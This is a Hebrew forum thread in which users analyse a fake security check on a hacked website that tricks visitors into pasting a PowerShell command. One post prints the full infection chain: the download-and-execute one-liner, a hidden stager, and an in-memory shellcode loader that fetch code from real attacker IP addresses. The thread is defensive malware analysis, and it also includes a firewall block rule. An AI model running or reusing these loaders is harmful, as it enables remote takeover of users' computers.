דילוג לתוכן
  • חוקי הפורום
  • פופולרי
  • לא נפתר
  • משתמשים
  • חיפוש גוגל בפורום
  • צור קשר
עיצובים
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • ברירת מחדל (ללא עיצוב (ברירת מחדל))
  • ללא עיצוב (ברירת מחדל)
כיווץ
מתמחים טופ
  1. דף הבית
  2. מחשבים וטכנולוגיה
  3. עזרה הדדית - מחשבים וטכנולוגיה
  4. בעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).

בעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).

מתוזמן נעוץ נעול הועבר עזרה הדדית - מחשבים וטכנולוגיה
35 פוסטים 11 כותבים 303 צפיות 10 עוקבים
  • מהישן לחדש
  • מהחדש לישן
  • הכי הרבה הצבעות
תגובה
  • תגובה כנושא
התחברו כדי לפרסם תגובה
נושא זה נמחק. רק משתמשים עם הרשאות מתאימות יוכלו לצפות בו.
  • בנימין מחשביםב מנותק
    בנימין מחשביםב מנותק
    בנימין מחשבים
    כתב נערך לאחרונה על ידי בנימין מחשבים
    #17

    @cfopuser @מתכנת-חובב @מישהו12

    סליחה על התיוג!

    השרשור המקורי

    תגובה 1 תגובה אחרונה
    2
    • מ מנותק
      מ מנותק
      מומחה123
      כתב נערך לאחרונה על ידי מומחה123
      #18

      זה מה שג'מיני כותב:

      ||הפקודה הזו אכן נראית כמו פקודה זדונית קלאסית, והיא משתמשת בטכניקה מוכרת מאוד בעולם אבטחת המידע הנקראת "Download and Execute" (הורדה והפעלה) או הפעלת "Fileless Malware" (תוכנה זדונית ללא קובץ).

      הנה פירוט טכני של מה שהפקודה הזאת עושה למחשב, צעד אחר צעד:

      powershell -c: החלק הזה פותח את שורת הפקודה של PowerShell (כלי ניהול ואוטומציה חזק של חלונות) ומורה לו להריץ את רצף הפקודות (c- הוא קיצור ל-Command) שמופיע מיד אחריו.

      iex: זהו קיצור (Alias) לפקודה Invoke-Expression. תפקידה לקחת טקסט פשוט ולהריץ אותו כקוד תוכנה. תוקפים משתמשים בפקודה זו בתדירות גבוהה משום שהיא מאפשרת הרצת קוד זדוני ישירות בזיכרון המחשב (RAM), מבלי לשמור אף קובץ על הדיסק הקשיח. הדבר מקשה מאוד על תוכנות אנטי-וירוס מסורתיות לזהות את הפעולה.

      irm 158.94.208.86: זהו קיצור לפקודה Invoke-RestMethod. הפקודה יוצרת קשר עם השרת המרוחק שיושב בכתובת ה-IP שצוינה (158.94.208.86) ומורידה ממנו תוכן. במקרה של תקיפה, התוכן הזה יהיה הקוד הזדוני האמיתי (ה-Payload).

      -UseBasicParsing: פרמטר שמורה ל-PowerShell להוריד את התוכן תוך שימוש במנגנון רשת בסיסי, מבלי להסתמך על מנוע של Internet Explorer. תוקפים מוסיפים את זה כדי "ללכת על בטוח" ולהבטיח שההורדה תצליח גם במחשבים (למשל שרתים ישנים) שבהם דפדפן לא הוגדר או לא הופעל מעולם.||

      תגובה 1 תגובה אחרונה
      -2
      • ה מנותק
        ה מנותק
        המלאך
        כתב נערך לאחרונה על ידי המלאך
        #19

        נסה להיכנס מדפדפן אחר.
        ואז נוכל לדעת אם זה [הקוד הזדוני] פריצה לאתר או תוסף בדפדפן.
        @יאיר-אלייצור זה מדפדפן אחר?
        אם זה היה פריצה לאתר זה היה אמור להופיע לכולם...

        תגובה 1 תגובה אחרונה
        0
        • י מנותק
          י מנותק
          יאיר אלייצור
          כתב נערך לאחרונה על ידי יאיר אלייצור
          #20

          צילום מסך 2026-03-30 135105.png

          תגובה 1 תגובה אחרונה
          0
          • ה החכם התם

            עכשיו נכנסתי לאתר של מכון כתר https://keter.org.il/חשש-ריבית-בחוזה-לקניית-דירה-במחיר-למשת/

            וזה מה שאני רואה : 422757c8-12a2-48e7-b283-69644c1d9aed-image.png

            למותר לציין שהאתר הזה הוא אתר אמין ואולי זה משהו חיצוני שהשתלט.

            cfopuserC מנותק
            cfopuserC מנותק
            cfopuser
            כתב נערך לאחרונה על ידי cfopuser
            #21

            @החכם-התם נראה שהם לא עדכנו את הפלאגינים של וורדפרס שלהם די הרבה זמן ומישהו מנצל את זה,
            לבינתיים חוסמי פרסומות חוסמים את הכתובת של התוקף.

            @מתכנת-חובב אפרופו peb הם משתמשים בזה גם כאן בשביל הshell code וגם עם הhash lookup.

            תגובה 1 תגובה אחרונה
            0
            • ה החכם התם

              עכשיו נכנסתי לאתר של מכון כתר https://keter.org.il/חשש-ריבית-בחוזה-לקניית-דירה-במחיר-למשת/

              וזה מה שאני רואה : 422757c8-12a2-48e7-b283-69644c1d9aed-image.png

              למותר לציין שהאתר הזה הוא אתר אמין ואולי זה משהו חיצוני שהשתלט.

              cfopuserC מנותק
              cfopuserC מנותק
              cfopuser
              כתב נערך לאחרונה על ידי cfopuser
              #22

              @החכם-התם אם למישהו יש קשר לבעל האתר שיודיע לו שיש להם גישה לכול השרת,
              בנוסף שיודיעו לו שכול עוד הוא מחשבון מנהל הוא לא יוכל לראות את התקיפה אז שיסתכל מאנונימי ושיוריד את האתר ויתקן.

              מ תגובה 1 תגובה אחרונה
              1
              • cfopuserC cfopuser

                @החכם-התם אם למישהו יש קשר לבעל האתר שיודיע לו שיש להם גישה לכול השרת,
                בנוסף שיודיעו לו שכול עוד הוא מחשבון מנהל הוא לא יוכל לראות את התקיפה אז שיסתכל מאנונימי ושיוריד את האתר ויתקן.

                מ מנותק
                מ מנותק
                מומחה123
                כתב נערך לאחרונה על ידי
                #23

                @cfopuser https://keter.org.il/יצירת-קשר/

                תגובה 1 תגובה אחרונה
                1
                • cfopuserC מנותק
                  cfopuserC מנותק
                  cfopuser
                  כתב נערך לאחרונה על ידי cfopuser
                  #24

                  אקדים ואומר זה מכיל פקודות זדוניות נא להפעיל ראש לפני שסתם עושים דברים,
                  אחרת אני לא אחראי על חוסר האחריות שלכם.

                  זה עכשיו מאוד קצר,
                  אני ישתדל להרחיב ולהסביר אחרי זה ביתר פירוט.
                  אם עניין מישהו
                  אז הפקודה הזאת

                  powershell -c iex(irm 158.94.208.86 -UseBasicParsing)
                  

                  מורידה את הסקריפט הזה (צריך user agent של powershell),

                  try {
                      $bjIpBGrKhSw = @'
                  try {
                      $checkResult = Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing
                      Invoke-Expression $checkResult.Content
                  } catch {
                  }
                  '@
                  
                      $nwlOLRnbTJHJGuIzB = New-Object System.Diagnostics.ProcessStartInfo
                      $nwlOLRnbTJHJGuIzB.FileName = "powershell.exe"
                      $nwlOLRnbTJHJGuIzB.Arguments = "-Command " + [char]34 + $bjIpBGrKhSw + [char]34
                      $nwlOLRnbTJHJGuIzB.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden
                      $nwlOLRnbTJHJGuIzB.CreateNoWindow = $true
                      $nwlOLRnbTJHJGuIzB.UseShellExecute = $false
                  
                      $PmgaQrhIGPERnniVQ = New-Object System.Diagnostics.Process
                      $PmgaQrhIGPERnniVQ.StartInfo = $nwlOLRnbTJHJGuIzB
                      $PmgaQrhIGPERnniVQ.Start() | Out-Null
                  } catch {
                  }
                  

                  שעושה כמה בדיקות ואז מוריד את הסקריפט הזה,

                  $qfxynVtaoWkTGXPO = "http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin"
                  try {
                      $wkjmvrrQYG = Invoke-WebRequest -Uri $qfxynVtaoWkTGXPO -UseBasicParsing -ErrorAction Stop
                      $fxfUCqgKMKyq = $wkjmvrrQYG.Content
                      $jQYxAVfWTktBrihYMu = $fxfUCqgKMKyq.Length
                      $oifeVAXruKV = @"
                  using System;
                  using System.Runtime.InteropServices;
                  public class xKuKzcdScrPfQpehRq {
                      [DllImport("kernel32.dll", SetLastError=true)]
                      public static extern IntPtr GetCurrentProcess();
                      [DllImport("kernel32.dll", SetLastError=true)]
                      public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
                      [DllImport("kernel32.dll", SetLastError=true)]
                      public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
                      [DllImport("kernel32.dll", SetLastError=true)]
                      public static extern uint WaitForSingleObject(IntPtr h, uint ms);
                  }
                  "@
                      Add-Type -TypeDefinition $oifeVAXruKV
                      $LDeyMEWUGUaRBLR = 0x1000
                      $YMnLUdAdCBUqtPwzZe = 0x2000
                      $NfbibNbjY = 0x40
                      $VJzynl = [xKuKzcdScrPfQpehRq]::VirtualAlloc([IntPtr]::Zero, $jQYxAVfWTktBrihYMu, $LDeyMEWUGUaRBLR -bor $YMnLUdAdCBUqtPwzZe, $NfbibNbjY)
                      if ($VJzynl -eq [IntPtr]::Zero) { throw "Alloc failed" }
                      [System.Runtime.InteropServices.Marshal]::Copy($fxfUCqgKMKyq, 0, $VJzynl, $jQYxAVfWTktBrihYMu)
                      $RcgZSyj = 0
                      $cDVcAqtqupLLT = [xKuKzcdScrPfQpehRq]::CreateThread([IntPtr]::Zero, 0, $VJzynl, [IntPtr]::Zero, 0, [ref]$RcgZSyj)
                      if ($cDVcAqtqupLLT -eq [IntPtr]::Zero) { throw "Thread failed" }
                      [xKuKzcdScrPfQpehRq]::WaitForSingleObject($cDVcAqtqupLLT, 30000) | Out-Null
                      Write-Host "done."
                  }
                  catch {
                      exit 1
                  }
                  

                  שהוא למעשה מוריד את הבינארי הזדוני ורק לram הוא מעולם לא נשמר למחשב,

                  my_l .bin.7z

                  סיסמה infected
                  https://www.virustotal.com/gui/file/c92950568a2b757d4ee0bad84b33f5b3414f0d5fdf3d3f5b06e7d304a7ccf1a1

                  לאחר מכן הshell code הזה שהוא מאוד דומה לפרויקט הזה ש@מתכנת-חובב העלה לא מזמן,

                  התוכנה הזאת מזריקה את עצמה לprocess בווינדוס כדוג' svchost.exe
                  ומשם ממשיכה הלאה צריך לראות מה ממשיך משם.

                  בכול אופן אני עכשיו מתמקד על איך האתר נפגע מלכתחילה ואיך הפריצה עובדת עכשיו.

                  es0583292679E תגובה 1 תגובה אחרונה
                  6
                  • cfopuserC cfopuser

                    אקדים ואומר זה מכיל פקודות זדוניות נא להפעיל ראש לפני שסתם עושים דברים,
                    אחרת אני לא אחראי על חוסר האחריות שלכם.

                    זה עכשיו מאוד קצר,
                    אני ישתדל להרחיב ולהסביר אחרי זה ביתר פירוט.
                    אם עניין מישהו
                    אז הפקודה הזאת

                    powershell -c iex(irm 158.94.208.86 -UseBasicParsing)
                    

                    מורידה את הסקריפט הזה (צריך user agent של powershell),

                    try {
                        $bjIpBGrKhSw = @'
                    try {
                        $checkResult = Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing
                        Invoke-Expression $checkResult.Content
                    } catch {
                    }
                    '@
                    
                        $nwlOLRnbTJHJGuIzB = New-Object System.Diagnostics.ProcessStartInfo
                        $nwlOLRnbTJHJGuIzB.FileName = "powershell.exe"
                        $nwlOLRnbTJHJGuIzB.Arguments = "-Command " + [char]34 + $bjIpBGrKhSw + [char]34
                        $nwlOLRnbTJHJGuIzB.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden
                        $nwlOLRnbTJHJGuIzB.CreateNoWindow = $true
                        $nwlOLRnbTJHJGuIzB.UseShellExecute = $false
                    
                        $PmgaQrhIGPERnniVQ = New-Object System.Diagnostics.Process
                        $PmgaQrhIGPERnniVQ.StartInfo = $nwlOLRnbTJHJGuIzB
                        $PmgaQrhIGPERnniVQ.Start() | Out-Null
                    } catch {
                    }
                    

                    שעושה כמה בדיקות ואז מוריד את הסקריפט הזה,

                    $qfxynVtaoWkTGXPO = "http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin"
                    try {
                        $wkjmvrrQYG = Invoke-WebRequest -Uri $qfxynVtaoWkTGXPO -UseBasicParsing -ErrorAction Stop
                        $fxfUCqgKMKyq = $wkjmvrrQYG.Content
                        $jQYxAVfWTktBrihYMu = $fxfUCqgKMKyq.Length
                        $oifeVAXruKV = @"
                    using System;
                    using System.Runtime.InteropServices;
                    public class xKuKzcdScrPfQpehRq {
                        [DllImport("kernel32.dll", SetLastError=true)]
                        public static extern IntPtr GetCurrentProcess();
                        [DllImport("kernel32.dll", SetLastError=true)]
                        public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
                        [DllImport("kernel32.dll", SetLastError=true)]
                        public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
                        [DllImport("kernel32.dll", SetLastError=true)]
                        public static extern uint WaitForSingleObject(IntPtr h, uint ms);
                    }
                    "@
                        Add-Type -TypeDefinition $oifeVAXruKV
                        $LDeyMEWUGUaRBLR = 0x1000
                        $YMnLUdAdCBUqtPwzZe = 0x2000
                        $NfbibNbjY = 0x40
                        $VJzynl = [xKuKzcdScrPfQpehRq]::VirtualAlloc([IntPtr]::Zero, $jQYxAVfWTktBrihYMu, $LDeyMEWUGUaRBLR -bor $YMnLUdAdCBUqtPwzZe, $NfbibNbjY)
                        if ($VJzynl -eq [IntPtr]::Zero) { throw "Alloc failed" }
                        [System.Runtime.InteropServices.Marshal]::Copy($fxfUCqgKMKyq, 0, $VJzynl, $jQYxAVfWTktBrihYMu)
                        $RcgZSyj = 0
                        $cDVcAqtqupLLT = [xKuKzcdScrPfQpehRq]::CreateThread([IntPtr]::Zero, 0, $VJzynl, [IntPtr]::Zero, 0, [ref]$RcgZSyj)
                        if ($cDVcAqtqupLLT -eq [IntPtr]::Zero) { throw "Thread failed" }
                        [xKuKzcdScrPfQpehRq]::WaitForSingleObject($cDVcAqtqupLLT, 30000) | Out-Null
                        Write-Host "done."
                    }
                    catch {
                        exit 1
                    }
                    

                    שהוא למעשה מוריד את הבינארי הזדוני ורק לram הוא מעולם לא נשמר למחשב,

                    my_l .bin.7z

                    סיסמה infected
                    https://www.virustotal.com/gui/file/c92950568a2b757d4ee0bad84b33f5b3414f0d5fdf3d3f5b06e7d304a7ccf1a1

                    לאחר מכן הshell code הזה שהוא מאוד דומה לפרויקט הזה ש@מתכנת-חובב העלה לא מזמן,

                    התוכנה הזאת מזריקה את עצמה לprocess בווינדוס כדוג' svchost.exe
                    ומשם ממשיכה הלאה צריך לראות מה ממשיך משם.

                    בכול אופן אני עכשיו מתמקד על איך האתר נפגע מלכתחילה ואיך הפריצה עובדת עכשיו.

                    es0583292679E מנותק
                    es0583292679E מנותק
                    es0583292679
                    כתב נערך לאחרונה על ידי es0583292679
                    #25

                    @cfopuser

                    שאפו על זה!
                    עד שפתחתי את המחשב אני רואה שמלאכתנו נעשה על ידך.
                    יישר כח ותזכה למצוות!

                    רחרחתי מעט על הקוד, ואכן יש הסבר פשוט מאד לרעיון של ההאקר.
                    למשל הוא מזריק קוד ישירות אחד אחרי השני בלי קבצי הרצה, על ידי שהמשתמש פתח את פוורשל והריץ שם הרצה וירטואלית, ואז הוא מוריד קודי הרצות נוספות בטקסט בלבד וממשיך משם בעצמו כמו דומינו, מה שמאפשר לו להשתלט לגמרי על המחשב ולעשות מה שהוא רוצה, בלי שום קובץ זדוני! סוג של גאונות.
                    יש עוד כמה דברים, למשל הוא כותב שהוא לא בוט כדי להטעות מערכות שבודקות הרצות בוטיות.

                    צריך ליצור סקריפט פשוט שחוסם את האייפי הזה לע"ע עד שנדע בעוד איזה כתובות הוא משתמש, ולבקש מכל מי שישמע לנו - להריץ את זה.
                    האמת לא צריך סקריפט, מספיק קוד לפיירוול משהו כמו:

                    New-NetFirewallRule -DisplayName "Block Malicious IP 84.21.189.170" -Direction Outbound -Action Block -RemoteAddress 84.21.189.170
                    

                    פוורשל כמנהל, לא בדקתי את זה - שמישהו יבדוק ואולי ישפר את זה.

                    מי שכבר הריץ בטעות, שיכבה מיד את המחשב! ויוציא את החומר בדיסק טכנאים ויבטל את כל ההעלאות האוטומטיות או שפשוט יתקין את וינדוס שוב ויחזיר את החומר (זה הכי טוב כנראה).


                    עריכה חשובה:

                    אני רואה שציינו כמה כתובות אייפי שונות, מה שגורם לחשוב שהוא יותר מתוחכם מזה, הוא מנווט באופן כלשהו אולי רנדומלי בין אייפי'ס, מה שמאפשר לו לנסות לעקוף את הפיירוול.

                    אז כל אחד שזה קרה לו, שישתף את הפקודה, וכך נוכל לאסוף כמה שיותר כתובות וליצור איזו פקודה שתחסום את כולם בשרשור אחד פשוט.

                    לקבוצה הכי מעניינת >> https://did.li/in1Nf

                    cfopuserC תגובה 1 תגובה אחרונה
                    0
                    • מ מומחה123

                      @החכם-התם כתב בבעיה | הונאה באתר מכון כת"ר:

                      הכנסתי קישור

                      אצלי האתר מופיע רגיל לגמרי

                      ק מנותק
                      ק מנותק
                      קרט
                      כתב נערך לאחרונה על ידי קרט
                      #26

                      @מומחה123 כתב בבעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).:

                      אצלי האתר מופיע רגיל לגמרי

                      הוא מופיע רגיל אבל אם תנסה לעבור לדף אחר תיתקל באימות אבטחה לוקח זמן עד שזה מופיע
                      ומוזר שניסתי להיכנס ל-KSP שזה אותה חברת אבטחה זה אימת לי אפילו בלי לבדוק כלום

                      es0583292679E ק 2 תגובות תגובה אחרונה
                      0
                      • ק קרט

                        @מומחה123 כתב בבעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).:

                        אצלי האתר מופיע רגיל לגמרי

                        הוא מופיע רגיל אבל אם תנסה לעבור לדף אחר תיתקל באימות אבטחה לוקח זמן עד שזה מופיע
                        ומוזר שניסתי להיכנס ל-KSP שזה אותה חברת אבטחה זה אימת לי אפילו בלי לבדוק כלום

                        es0583292679E מנותק
                        es0583292679E מנותק
                        es0583292679
                        כתב נערך לאחרונה על ידי
                        #27

                        @קרט

                        אויש נו.
                        באתר אין באמת אימות של קלאודפלייר, זה חיקוי חמוד, באמת חמוד, ניתן ליצור אותו ב5 דק' בAI, אבל גאוני.

                        לקבוצה הכי מעניינת >> https://did.li/in1Nf

                        תגובה 1 תגובה אחרונה
                        0
                        • es0583292679E es0583292679

                          @cfopuser

                          שאפו על זה!
                          עד שפתחתי את המחשב אני רואה שמלאכתנו נעשה על ידך.
                          יישר כח ותזכה למצוות!

                          רחרחתי מעט על הקוד, ואכן יש הסבר פשוט מאד לרעיון של ההאקר.
                          למשל הוא מזריק קוד ישירות אחד אחרי השני בלי קבצי הרצה, על ידי שהמשתמש פתח את פוורשל והריץ שם הרצה וירטואלית, ואז הוא מוריד קודי הרצות נוספות בטקסט בלבד וממשיך משם בעצמו כמו דומינו, מה שמאפשר לו להשתלט לגמרי על המחשב ולעשות מה שהוא רוצה, בלי שום קובץ זדוני! סוג של גאונות.
                          יש עוד כמה דברים, למשל הוא כותב שהוא לא בוט כדי להטעות מערכות שבודקות הרצות בוטיות.

                          צריך ליצור סקריפט פשוט שחוסם את האייפי הזה לע"ע עד שנדע בעוד איזה כתובות הוא משתמש, ולבקש מכל מי שישמע לנו - להריץ את זה.
                          האמת לא צריך סקריפט, מספיק קוד לפיירוול משהו כמו:

                          New-NetFirewallRule -DisplayName "Block Malicious IP 84.21.189.170" -Direction Outbound -Action Block -RemoteAddress 84.21.189.170
                          

                          פוורשל כמנהל, לא בדקתי את זה - שמישהו יבדוק ואולי ישפר את זה.

                          מי שכבר הריץ בטעות, שיכבה מיד את המחשב! ויוציא את החומר בדיסק טכנאים ויבטל את כל ההעלאות האוטומטיות או שפשוט יתקין את וינדוס שוב ויחזיר את החומר (זה הכי טוב כנראה).


                          עריכה חשובה:

                          אני רואה שציינו כמה כתובות אייפי שונות, מה שגורם לחשוב שהוא יותר מתוחכם מזה, הוא מנווט באופן כלשהו אולי רנדומלי בין אייפי'ס, מה שמאפשר לו לנסות לעקוף את הפיירוול.

                          אז כל אחד שזה קרה לו, שישתף את הפקודה, וכך נוכל לאסוף כמה שיותר כתובות וליצור איזו פקודה שתחסום את כולם בשרשור אחד פשוט.

                          cfopuserC מנותק
                          cfopuserC מנותק
                          cfopuser
                          כתב נערך לאחרונה על ידי
                          #28

                          @es0583292679 כתב בבעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).:

                          אז כל אחד שזה קרה לו, שישתף את הפקודה, וכך נוכל לאסוף כמה שיותר כתובות וליצור איזו פקודה שתחסום את כולם בשרשור אחד פשוט.

                          מה זה יעזור התוקף פשוט קונה חבילה ענקית של seedbox ויש לו אינספור כתובות מה תחסום טווחים שלמים?
                          אם כבר שנטפרי יתחילו לעקוב אחרי רשימות כמו easylist וככה יספקו אבטחה למשתמשים שלהם.

                          תגובה 1 תגובה אחרונה
                          1
                          • ק קרט

                            @מומחה123 כתב בבעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).:

                            אצלי האתר מופיע רגיל לגמרי

                            הוא מופיע רגיל אבל אם תנסה לעבור לדף אחר תיתקל באימות אבטחה לוקח זמן עד שזה מופיע
                            ומוזר שניסתי להיכנס ל-KSP שזה אותה חברת אבטחה זה אימת לי אפילו בלי לבדוק כלום

                            ק מנותק
                            ק מנותק
                            קרט
                            כתב נערך לאחרונה על ידי
                            #29

                            אפשר לעקוף אותו ע"י שהולכים ואז חוזרים אחרי כמה שניות והוא "מאמת"

                            cfopuserC תגובה 1 תגובה אחרונה
                            0
                            • ק קרט

                              אפשר לעקוף אותו ע"י שהולכים ואז חוזרים אחרי כמה שניות והוא "מאמת"

                              cfopuserC מנותק
                              cfopuserC מנותק
                              cfopuser
                              כתב נערך לאחרונה על ידי cfopuser
                              #30

                              @קרט בעיקרון אפשר להשתמש בפרצה שהתוקף נכנס איתה מלכתחילה ולנקות את האתר,
                              אבל צריך לזה כבר רשות מהבעלים.

                              זה האמת יותר מעניין מאשר איך התקיפה קורית במחשב זה איך התקיפה קורית באתר עצמו.

                              es0583292679E תגובה 1 תגובה אחרונה
                              0
                              • LEVI HL מחובר
                                LEVI HL מחובר
                                LEVI H
                                מדריכים
                                כתב נערך לאחרונה על ידי
                                #31

                                אני חושב שפה ניתחו די והותר איך הסקריפטים האלה עובדים,
                                ניתן פשוט לצפות.. לא צריך להמציא את הגלגל..

                                בנימין מחשביםב cfopuserC 2 תגובות תגובה אחרונה
                                0
                                • LEVI HL LEVI H

                                  אני חושב שפה ניתחו די והותר איך הסקריפטים האלה עובדים,
                                  ניתן פשוט לצפות.. לא צריך להמציא את הגלגל..

                                  בנימין מחשביםב מנותק
                                  בנימין מחשביםב מנותק
                                  בנימין מחשבים
                                  כתב נערך לאחרונה על ידי
                                  #32

                                  @LEVI-H אולי לזה התכוון @cfopuser שכתב בבעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).:

                                  זה האמת יותר מעניין מאשר איך התקיפה קורית במחשב זה איך התקיפה קורית באתר עצמו.

                                  תגובה 1 תגובה אחרונה
                                  0
                                  • LEVI HL LEVI H

                                    אני חושב שפה ניתחו די והותר איך הסקריפטים האלה עובדים,
                                    ניתן פשוט לצפות.. לא צריך להמציא את הגלגל..

                                    cfopuserC מנותק
                                    cfopuserC מנותק
                                    cfopuser
                                    כתב נערך לאחרונה על ידי cfopuser
                                    #33

                                    @LEVI-H האמת השיטה מפה ושם היא מאד שונה שמה זה היה dlll injection לתוך תוכנה לגטימית ואחרי זה שימוש בפרצות די מגניבות במספר תוכנות חתומות שונות.

                                    כאן זה יותר במנגנון של rat כיון שזה מזריק את עצמו לתוך תהליך קיים עם הרשאות ניהול,
                                    ככה שהוא פועל כאילו הוא ווינדוס בעצמו.

                                    שמה זה התפרסם דרך פרסומות ששילמו עליהם.
                                    כאן פשוט פרצו לאתר דרך פלאגין לא מעודכן וערכו את הקוד ככה שהוא יתקשר עם השר של התוקף, ועוד ועוד.

                                    תגובה 1 תגובה אחרונה
                                    1
                                    • cfopuserC cfopuser

                                      @קרט בעיקרון אפשר להשתמש בפרצה שהתוקף נכנס איתה מלכתחילה ולנקות את האתר,
                                      אבל צריך לזה כבר רשות מהבעלים.

                                      זה האמת יותר מעניין מאשר איך התקיפה קורית במחשב זה איך התקיפה קורית באתר עצמו.

                                      es0583292679E מנותק
                                      es0583292679E מנותק
                                      es0583292679
                                      כתב נערך לאחרונה על ידי es0583292679
                                      #34

                                      @cfopuser

                                      אני לא חושב שמי שעובד עם וורדפרס, זה סיפור כל כך מורכב.
                                      כל תוסף יכול לעשות את זה...
                                      אתה יכול ליצור תוסף בכמה דקות, ואם זה חשוב לך - בכמה שעות, או, לפרוץ תוסף בתשלום ולחלק אותו בחינם...
                                      ואופס! אתה בפנים, בכל אתר שהתקין את התוסף הזה.
                                      כמה קל.

                                      זה עוד סיבה למה לא להשתמש בוורדפרס.


                                      עריכה:
                                      אני רואה שכבר כתבת את זה בעצמך.

                                      לקבוצה הכי מעניינת >> https://did.li/in1Nf

                                      תגובה 1 תגובה אחרונה
                                      0
                                      • LEVI HL מחובר
                                        LEVI HL מחובר
                                        LEVI H
                                        מדריכים
                                        כתב נערך לאחרונה על ידי LEVI H
                                        #35

                                        דיברתי בעיקר על ההנדסה החברתית שמאפיינת את סוגי הוירוסים האלו, ועל השלבים הראשונים שלה שמשותפים ב99% עם הסוגי וירוסים האלו.

                                        תגובה 1 תגובה אחרונה
                                        0

                                        • התחברות

                                        • אין לך חשבון עדיין? הרשמה

                                        • התחברו או הירשמו כדי לחפש.
                                        • פוסט ראשון
                                          פוסט אחרון
                                        0
                                        • חוקי הפורום
                                        • פופולרי
                                        • לא נפתר
                                        • משתמשים
                                        • חיפוש גוגל בפורום
                                        • צור קשר